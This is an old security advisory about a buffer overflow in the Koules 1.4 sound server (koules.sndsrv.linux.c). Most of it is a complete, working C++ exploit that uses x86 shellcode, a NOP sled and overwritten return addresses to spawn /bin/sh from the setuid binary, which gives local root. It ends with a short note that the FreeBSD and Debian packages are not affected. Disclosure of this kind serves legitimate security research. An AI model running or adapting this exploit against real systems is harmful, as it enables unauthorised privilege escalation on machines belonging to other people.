Vulnerability

    Koules

Affected

    Koules1.4

Description

    Guido Bakker  found following.   The problem  can be  found in the
    Koules1.4 package, code file:

        koules.sndsrv.linux.c - function: init()

    The `int i`  disappears in the  optimization gcc does.   Since the
    strcat() function concatenates an array of filenames, `argv`  gets
    ruined.  This will  cause the first run  of the loop to  fail.  If
    argv point somewhere into adressable memory space, the chances  of
    having  a  second  pointer  in  there  are close to zero, thus the
    second loop will fail.

    Last of  all, if  the argv[1]  does point  to a  valid address the
    string contained there shouldn't  be long enough to  overwrite eip
    a second time, since that gets us into trouble.  That's about  it.
    Even then, this ONLY works on machines that have compiled  SVGALIB
    support in and NOT on the X windows version of 'koules'.

    /*
       Coolz.cpp - yep a C Plus Plus exploit, I like that Strings STL :)

       Love goes out to: Hester and Maja
       Shouts go out to: Aad de Bruin, Karel Roos, L.G. Weert, Louis Maatman,
                         Richard Vriesde.
                 --  We always did feel the same, we just saw it from a
                      different point of view...
                          [Bob Dylan - Tangled up in Blue]

       -- Scrippie/ronald@grafix.nl
    /*

    /* Synnergy.net (c) 2000 */

    #include <cstdio>
    #include <string>
    #include <cstdlib>
    #include <unistd.h>

    #define FILENAME "/usr/local/lib/koules/koules.sndsrv.linux"

    #define NOP	'A'
    #define NUMNOPS	500
    #define RETADDY	"\x90\xfe\xff\xbf"
    /* Since we return in the cleared environment, we don't need to have a
       return address we can influence by command line "offset" arguments */

    string heavenlycode =
      "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
      "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
      "\x80\xe8\xdc\xff\xff\xff/bin/sh";

    char *addytostr(unsigned char *);

    using namespace std;

    main()
    {
       string payload, vector;
       unsigned int i;
       const char *env[3];
       const char *ptr_to_bffffffc;

       /* Construction of our payload */
       payload.append(NUMNOPS, NOP);
       payload.append(heavenlycode);

       env[0] = payload.c_str();
       /* This memory address always contains 0x00000000 */
       env[1] = "\xfc\xff\xff\xbf";
       env[2] = NULL;

       /* Calculate for yourself, and check out: linux/fs/exec.c */
       ptr_to_bffffffc =
            addytostr((unsigned char *)(0xc0000000-sizeof(void *)-sizeof(FILENAME)
                                        -sizeof(heavenlycode)-sizeof(char *)-1));

       for(i=0;i<256;i++) {
          vector.append(RETADDY);		/* Fill the buffer */
       }
       /* We do NOT overwrite 'int i' - a register is used after gcc -O */
       vector.append(RETADDY);		/* Overwrites ebp */
       vector.append(RETADDY);		/* Overwrites eip */
       vector.append(ptr_to_bffffffc);	/* Overwrites argv argument */

       execle(FILENAME, "Segmentation fault (core dumped)", vector.c_str(), "A",
              NULL, env);

       perror("execle()");
    }

    char *addytostr(unsigned char *blaat)
    {
       char *ret;

       if(!(ret = (char *)malloc(sizeof(unsigned char *)+1))) {
          perror("malloc()");
          exit(EXIT_FAILURE);
       }
       memcpy(ret, &blaat, sizeof(unsigned char *));
       ret[sizeof(unsigned char *)] = 0x00;

       return(ret);
    }

Solution

    The  FreeBSD  xkoules  port  doesnt  install  anything  setuid  or
    setgid..therefore not vulnerable.  Debian does not ship koules  or
    parts  of  it  setuid  root  and  thus  is  not vulnerable to this
    exploit.